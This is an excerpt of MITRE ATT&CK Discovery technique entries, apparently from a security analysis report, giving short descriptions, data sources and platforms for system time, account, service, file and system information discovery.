Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre